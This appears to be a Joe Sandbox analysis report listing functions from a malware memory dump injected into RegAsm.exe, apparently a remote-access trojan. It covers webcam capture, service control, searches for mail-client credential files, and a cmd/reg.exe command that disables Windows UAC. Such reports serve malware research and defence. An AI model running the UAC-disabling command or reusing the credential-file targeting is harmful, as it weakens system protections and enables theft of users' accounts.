Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: H_prologSleep
String ID: CloseCamera$FreeFrame$GetFrame$HNG$OpenCamera
API String ID: 3469354165-3054508432
Opcode ID: caf9a30ef87f1776ebf33ecd15a497eb398b4c3dfc9f22543f24beb9b8b1830c
Instruction ID: 62663cdee79800d8a54f028f5a980ee1c6790ad11611a7059aef087dab150aaf
Opcode Fuzzy Hash: caf9a30ef87f1776ebf33ecd15a497eb398b4c3dfc9f22543f24beb9b8b1830c
Instruction Fuzzy Hash: 5C51E1B1A042116BCA14FB369D0A66E3755ABC5748F00053FFA06677E2EF7C8A45839E

Function 004458F9 Relevance: 9.2, APIs: 6, Instructions: 200COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftoe.LIBCMT ref: 00445925
__cftoe.LIBCMT ref: 00445957

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: __cftoe
String ID:
API String ID: 4189289331-0
Opcode ID: eef5811f0b3e11eaf1bdde4175ac7a9ebfa2f3cd5d18ba66a6432d1456243127
Instruction ID: 6c78d09a6f5169ef6f707262af513c71f712f2c279f5202ad8aecd4a6012115a
Opcode Fuzzy Hash: eef5811f0b3e11eaf1bdde4175ac7a9ebfa2f3cd5d18ba66a6432d1456243127
Instruction Fuzzy Hash: D951EA72900A05ABFF209B59CC81FAF77A9EF49334F14421FF515A6293DB39D900866C

Function 100015DA Relevance: 9.1, APIs: 6, Instructions: 84stringCOMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 10001607
_strcat.LIBCMT ref: 1000161D
lstrlenW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,1000190E,?,?,00000000,?,00000000), ref: 10001643
lstrcatW.KERNEL32(?,?), ref: 1000165A
lstrlenW.KERNEL32(?,?,?,?,?,1000190E,?,?,00000000,?,00000000,?,?,?,00000104,?), ref: 10001661
lstrcatW.KERNEL32(00001008,?), ref: 10001686

Memory Dump Source

Source File: 00000010.00000002.958379212.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000010.00000002.958369053.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.958379212.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_10000000_RegAsm.jbxd

Similarity

API ID: lstrcatlstrlen$_strcat_strlen
String ID:
API String ID: 1922816806-0
Opcode ID: 315c55c979a72bdf3ac51594b752bef976f460307e9923370b73d2b1bd80b905
Instruction ID: a267a6945d1554df97f4c8e17fbec8689bbb0548aac84132402ab8fad08d9bbc
Opcode Fuzzy Hash: 315c55c979a72bdf3ac51594b752bef976f460307e9923370b73d2b1bd80b905
Instruction Fuzzy Hash: 9821A776900204ABEB05DBA4DC85FEE77B8EF88750F24401BF604AB185DF34B94587A9

Function 10001000 Relevance: 9.1, APIs: 6, Instructions: 76stringCOMMON

Download Yara Rule

APIs

lstrcatW.KERNEL32(?,?), ref: 10001038
lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 1000104B
lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 10001061
lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 10001075
GetFileAttributesW.KERNEL32(?,?,?,00000000), ref: 10001090
lstrlenW.KERNEL32(?,?,?,00000000), ref: 100010B8

Memory Dump Source

Source File: 00000010.00000002.958379212.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000010.00000002.958369053.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.958379212.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_10000000_RegAsm.jbxd

Similarity

API ID: lstrlen$AttributesFilelstrcat
String ID:
API String ID: 3594823470-0
Opcode ID: c62e9e5fa69f7526a4dcdb62aa87bf44082eca201cfcddb2e536fed9ba73336f
Instruction ID: f5da6160d3db499da992451a69b84f141dc83571de07cfa19ff2ab3d93a8fd2c
Opcode Fuzzy Hash: c62e9e5fa69f7526a4dcdb62aa87bf44082eca201cfcddb2e536fed9ba73336f
Instruction Fuzzy Hash: DB21E5359003289BEF10DBA0DC48EDF37B8EF44294F104556E999931A6DE709EC5CF50

Function 0041AC78 Relevance: 9.1, APIs: 6, Instructions: 67serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,00000000,?,?,?,0041A38E,00000000), ref: 0041AC88
OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,?,?,0041A38E,00000000), ref: 0041AC9C
CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A38E,00000000), ref: 0041ACA9
ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,0041A38E,00000000), ref: 0041ACDE
CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A38E,00000000), ref: 0041ACF0
CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A38E,00000000), ref: 0041ACF3

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Service$CloseHandle$Open$ChangeConfigManager
String ID:
API String ID: 493672254-0
Opcode ID: efec56fc5935d5a2572c80bdc1daad9799237a8c2fd258714d4154745ff5c6c1
Instruction ID: ed0bae8235b77a8e2b5b4951a925fd67a34dfbd091713fce30693036f81a5133
Opcode Fuzzy Hash: efec56fc5935d5a2572c80bdc1daad9799237a8c2fd258714d4154745ff5c6c1
Instruction Fuzzy Hash: 84014E311452147BD6110B385C4DEFB3B5CDB42771F100317F925922D1EA68CD45B5EE

Function 10003856 Relevance: 9.1, APIs: 6, Instructions: 60COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,10003518,100023F1,10001F17), ref: 10003864
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 10003872
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 1000388B
SetLastError.KERNEL32(00000000,?,10003518,100023F1,10001F17), ref: 100038DD

Memory Dump Source

Source File: 00000010.00000002.958379212.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000010.00000002.958369053.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.958379212.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_10000000_RegAsm.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 669731f2127195b9a905fed2c89c9d5b837464d933d8447bfa53086d9201cd33
Instruction ID: 2a33bd680f99e964f7cdf1ea0b0e713dcb61597015083b2077453114c578dac0
Opcode Fuzzy Hash: 669731f2127195b9a905fed2c89c9d5b837464d933d8447bfa53086d9201cd33
Instruction Fuzzy Hash: 0F012432608B225EF207D7796CCAA0B2BDDDB096F9B20C27AF510940E9EF219C009300

Function 10005AF6 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,10006C6C), ref: 10005AFA
_free.LIBCMT ref: 10005B2D
_free.LIBCMT ref: 10005B55
SetLastError.KERNEL32(00000000,?,?,10006C6C), ref: 10005B62
SetLastError.KERNEL32(00000000,?,?,10006C6C), ref: 10005B6E
_abort.LIBCMT ref: 10005B74

Memory Dump Source

Source File: 00000010.00000002.958379212.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000010.00000002.958369053.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.958379212.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_10000000_RegAsm.jbxd

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: c9cb188a03aa1811073f11ee06fa520bea6a831bfab7ff5292fc2b03e8e202de
Instruction ID: 6ab9c425fee0725613b21b3b36aaf5e4259b246f4cabca8c388d0d7fb541d563
Opcode Fuzzy Hash: c9cb188a03aa1811073f11ee06fa520bea6a831bfab7ff5292fc2b03e8e202de
Instruction Fuzzy Hash: 8FF0A47A508911AAF212E3346C4AF0F36AACBC55E3F264125F918A619DFF27B9024174

Function 00448215 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
_free.LIBCMT ref: 0044824C
_free.LIBCMT ref: 00448274
SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 00448281
SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
_abort.LIBCMT ref: 00448293

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: d577d612c1ffbc00090520c66a2c794f4cb9603406b177c38f93d9dbc2276fca
Instruction ID: 1e51d54565af68f960eede883612623578b8b4ccb82fc25c91f14e3db4823c68
Opcode Fuzzy Hash: d577d612c1ffbc00090520c66a2c794f4cb9603406b177c38f93d9dbc2276fca
Instruction Fuzzy Hash: 15F0F935104F006AF611332A6C05B5F2515ABC276AF25066FF92892292DFACCC4581AD

Function 0041AAA6 Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAB5
OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAC9
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAD6
ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAE5
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAF7
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAFA

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Service$CloseHandle$Open$ControlManager
String ID:
API String ID: 221034970-0
Opcode ID: 4ae3873c1f536b49cfb6b65ca2e5a3703e9976f2291b0d96870e63be56c21842
Instruction ID: 651adf303b3d55a6ad93a9774d9c6d096703db2647e4265c62a250da7e042a32
Opcode Fuzzy Hash: 4ae3873c1f536b49cfb6b65ca2e5a3703e9976f2291b0d96870e63be56c21842
Instruction Fuzzy Hash: 68F0C231541218ABD711AF25AC49EFF3B6CDF45BA2F000026FE0992192DB68CD4695E9

Function 0041ABAA Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABB9
OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABCD
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABDA
ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABE9
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABFB
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABFE

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Service$CloseHandle$Open$ControlManager
String ID:
API String ID: 221034970-0
Opcode ID: 81e2b4606ab98421978dc9842ef1edfa46dc1b90a9204ca08327dde20b0592b6
Instruction ID: cdcae22f94af1ce7d279f83afe572816001e75aa845eac4345c2c81124f82824
Opcode Fuzzy Hash: 81e2b4606ab98421978dc9842ef1edfa46dc1b90a9204ca08327dde20b0592b6
Instruction Fuzzy Hash: 84F0C231501218ABD6116F259C49DFF3B6CDB45B62F40002AFE0996192EB38DD4595F9

Function 0041AC11 Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC20
OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC34
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC41
ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC50
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC62
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC65

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Service$CloseHandle$Open$ControlManager
String ID:
API String ID: 221034970-0
Opcode ID: fc89c5385e453168767847f65058b20f434ef67782af095c3a641765214ec1d0
Instruction ID: 1af6be829003de2eeb85b71d4b0cbdb2c911632148e7083bdbbda8586ff13133
Opcode Fuzzy Hash: fc89c5385e453168767847f65058b20f434ef67782af095c3a641765214ec1d0
Instruction Fuzzy Hash: 2FF0F631501228BBD711AF25EC49DFF3B6CDB45B62F00002AFE0992192EB38CD4595F9

Function 00443435 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 116COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000104), ref: 00443475
_free.LIBCMT ref: 00443540
_free.LIBCMT ref: 0044354A

Strings

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, xrefs: 0044346C, 00443473, 004434A2, 004434DA
82q, xrefs: 0044347B

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: _free$FileModuleName
String ID: 82q$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
API String ID: 2506810119-2235266433
Opcode ID: c70776266e2bd8d98222b272a4c4964d73f1f6f6485ba9fff5740fbb3794026e
Instruction ID: 78b8e4ab202bb8962dfea6a4c95dea7b8c186c0554b41bb8e719afd17783d6d0
Opcode Fuzzy Hash: c70776266e2bd8d98222b272a4c4964d73f1f6f6485ba9fff5740fbb3794026e
Instruction Fuzzy Hash: 2E31C471A00258BFEB21DF999C8199EBBBCEF85B15F10406BF50497311D6B89F81CB98

Function 100011EA Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 90COMMON

Download Yara Rule

APIs

Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,?,?,?,100010DF,?,?,?,00000000), ref: 10001E9A
Part of subcall function 10001E89: lstrcatW.KERNEL32(?,?), ref: 10001EAC
Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EB3
Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EC8
Part of subcall function 10001E89: lstrcatW.KERNEL32(?,100010DF), ref: 10001ED3

GetFileAttributesW.KERNEL32(?,?,?,?), ref: 1000122A

Part of subcall function 1000173A: _strlen.LIBCMT ref: 10001855
Part of subcall function 1000173A: _strlen.LIBCMT ref: 10001869

Strings

\Accounts\Account.rec0, xrefs: 1000125A
\Storage\, xrefs: 10001246
\Mail\, xrefs: 1000126D
\Data\AccCfg\Accounts.tdat, xrefs: 1000120E

Memory Dump Source

Source File: 00000010.00000002.958379212.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000010.00000002.958369053.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.958379212.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_10000000_RegAsm.jbxd

Similarity

API ID: lstrlen$_strlenlstrcat$AttributesFile
String ID: \Accounts\Account.rec0$\Data\AccCfg\Accounts.tdat$\Mail\$\Storage\
API String ID: 4036392271-1520055953
Opcode ID: 09c536ecd907401b0aa489f333ca62d314ebad464b807bf11bf7235871964734
Instruction ID: e2b7c7e1c3038021adfe9ab266432482c710e64fc4cfb1bae4cfd9c1521b4980
Opcode Fuzzy Hash: 09c536ecd907401b0aa489f333ca62d314ebad464b807bf11bf7235871964734
Instruction Fuzzy Hash: 4B21D579E142486AFB14D7A0EC92FED7339EF80754F000556F604EB1D5EBB16E818758

Function 0040A675 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58sleepfileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0040A6AB
GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A74D), ref: 0040A6BA
Sleep.KERNEL32(00002710,?,?,?,0040A74D), ref: 0040A6E7
CloseHandle.KERNEL32(00000000), ref: 0040A6EE

Strings

hnv, xrefs: 0040A6A0

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleSizeSleep
String ID: hnv
API String ID: 1958988193-4221424042
Opcode ID: ed692bf81f71d99d64d0e48405d0f3cb823898ebec9c5078a7592842c921da17
Instruction ID: 2d5b847f40b6dc6d65e682cb961bc0859910b41d7418e35cc132b68a4a9af338
Opcode Fuzzy Hash: ed692bf81f71d99d64d0e48405d0f3cb823898ebec9c5078a7592842c921da17
Instruction Fuzzy Hash: AD112B30600740EEE631A7249895A5F3B6AEB41356F48083AF2C26B6D2C6799CA0C35E

Function 0041D50F Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 57registryCOMMON

Download Yara Rule

APIs

RegisterClassExA.USER32 ref: 0041D55B
CreateWindowExA.USER32 ref: 0041D576
GetLastError.KERNEL32 ref: 0041D580

Strings

0, xrefs: 0041D52B
MsgWindowClass, xrefs: 0041D526

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ClassCreateErrorLastRegisterWindow
String ID: 0$MsgWindowClass
API String ID: 2877667751-2410386613
Opcode ID: a7bf03488480a67a5ab74e572dd3e9b3283d69d087452f3b28ffeaf09d6b5029
Instruction ID: 921741f364e14ac5d494c0d6481b3569f22aad0bbfd2e997b493b5423d792a6e
Opcode Fuzzy Hash: a7bf03488480a67a5ab74e572dd3e9b3283d69d087452f3b28ffeaf09d6b5029
Instruction Fuzzy Hash: 910129B1D00219BBDB00DFD5ECC49EFBBBDEA04355F40053AF900A6240E77859058AA4

Function 00407755 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 43processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 0040779B
CloseHandle.KERNEL32(?), ref: 004077AA
CloseHandle.KERNEL32(?), ref: 004077AF

Strings

C:\Windows\System32\cmd.exe, xrefs: 00407796
/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 00407791

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CloseHandle$CreateProcess
String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
API String ID: 2922976086-4183131282
Opcode ID: 86afbde76f2a9426f4ed7e8e7c7881cd7a3c7ba11745d0fd7a0dc136aa7099f4
Instruction ID: bcd6b2dc2297655d1c2a6c7a9d844aadd79638dc8707381bf3a952a3ff6736b4
Opcode Fuzzy Hash: 86afbde76f2a9426f4ed7e8e7c7881cd7a3c7ba11745d0fd7a0dc136aa7099f4
Instruction Fuzzy Hash: BCF03676D4029D76CB20ABD6DC0EEDF7F7DEBC5B11F00056AF904A6141E6746404C6B9

Function 0044333A Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,004432EB,?,?,0044328B,?), ref: 0044335A
GetProcAddress.KERNEL32(00000000,CorExitProcess,?,?,?,?,004432EB,?,?,0044328B,?), ref: 0044336D
FreeLibrary.KERNEL32(00000000,?,?,?,004432EB,?,?,0044328B,?), ref: 00443390

Strings

CorExitProcess, xrefs: 00443365
mscoree.dll, xrefs: 00443353

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: cc52f7ac488aa55dad4b7db89aaf695af0dd1fe717ea7d7a85019ca2162c21c0
Instruction ID: b4f1316bd170a33105784e50650a9bde6d9e9410588fddf83d5a1a7bf10dc45d
Opcode Fuzzy Hash: cc52f7ac488aa55dad4b7db89aaf695af0dd1fe717ea7d7a85019ca2162c21c0
Instruction Fuzzy Hash: 6AF0A430A00208FBDB149F55DC09B9EBFB4EF04713F0041A9FC05A2261CB349E40CA98

Function 004050E4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 35synchronizationCOMMON

Download Yara Rule

APIs

CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00405120
SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 0040512C
WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 00405137
CloseHandle.KERNEL32(?), ref: 00405140

Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509

Strings

KeepAlive | Disabled, xrefs: 004050F9

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
String ID: KeepAlive | Disabled
API String ID: 2993684571-305739064
Opcode ID: 11e320f67abdd95442ebe69be37ae07741154b3609cf10b7525108ad99fbffe3
Instruction ID: c1447ea2195e795a2fa4d382ed9a15925dec3dc8ccf256ab7d783030aa8980db
Opcode Fuzzy Hash: 11e320f67abdd95442ebe69be37ae07741154b3609cf10b7525108ad99fbffe3
Instruction Fuzzy Hash: 4CF06271904711BBDB103B758D0A66B7A54AB02311F0009BEF982916E2D6798840CF9A

Function 0041ADC0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509

GetModuleHandleA.KERNEL32(00000000,00020009), ref: 0041ADF2
PlaySoundW.WINMM(00000000,00000000), ref: 0041AE00
Sleep.KERNEL32(00002710), ref: 0041AE07
PlaySoundW.WINMM(00000000,00000000,00000000), ref: 0041AE10

Strings

Alarm triggered, xrefs: 0041ADC9

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: PlaySound$HandleLocalModuleSleepTime
String ID: Alarm triggered
API String ID: 614609389-2816303416
Opcode ID: 458a9fadc2ddf1b51f38526f332080559b1bee2397fd5821544ba6e308cf5034
Instruction ID: 9c0713ce1321a11b0f254193fe9a85ef30a97b7eb59a64372af151f10574a600
Opcode Fuzzy Hash: 458a9fadc2ddf1b51f38526f332080559b1bee2397fd5821544ba6e308cf5034
Instruction Fuzzy Hash: 36E01226B44260779620377B6D4FD6F3D28DAC2B5170100BEFA0666192D9580C4586FB

Function 0041CD58 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,0041CDED), ref: 0041CD62
